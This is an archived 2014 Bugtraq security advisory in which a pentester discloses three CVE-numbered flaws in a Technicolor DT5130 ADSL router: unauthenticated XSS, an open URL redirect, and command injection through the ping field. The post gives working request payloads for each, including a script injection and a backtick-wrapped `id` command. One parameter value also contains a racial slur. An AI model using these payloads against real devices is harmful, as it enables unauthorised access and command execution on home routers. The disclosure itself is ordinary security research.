lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAN6_2Vamz9wLLR3Cz0i+OssnN0X1XHejubMMZfZqUW0g5kPc3w@mail.gmail.com>
Date: Wed, 3 Dec 2014 09:10:22 -0200
From: Ewerson GuimarĂ£es (Crash) - Dclabs <crash@...abs.com.br>
To: bugtraq@...urityfocus.com, Gelloz Raphael <Raphael.Gelloz@...hnicolor.com>
Subject: Wireless N ADSL 2/2+ Modem Router - DT5130 - Xss / URL Redirect /
 Command Injection

Product: Wireless N ADSL 2/2+ Modem Router
Firmware Version : V2.05.C29GV
Modem Type : ADSL2+ Router
Modem Vendor : Technicolor
Model: DT5130

Bugs:
1- Unauth Xss - CVE-2014-9142
user=teste&password=teste&
userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login

2- Arbitrari URL redirect - CVE-2014-9143
failrefer=http://blog.dclabs.com.br&login=Login&password=
pass&refer=/index.html&user=1&userlevel=15

3- Command Injection in ping field - CVE-2014-9144
setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE


-- 
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs / Ibliss  Security Team
www.dclabs.com.br / www.ibliss.com.br

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ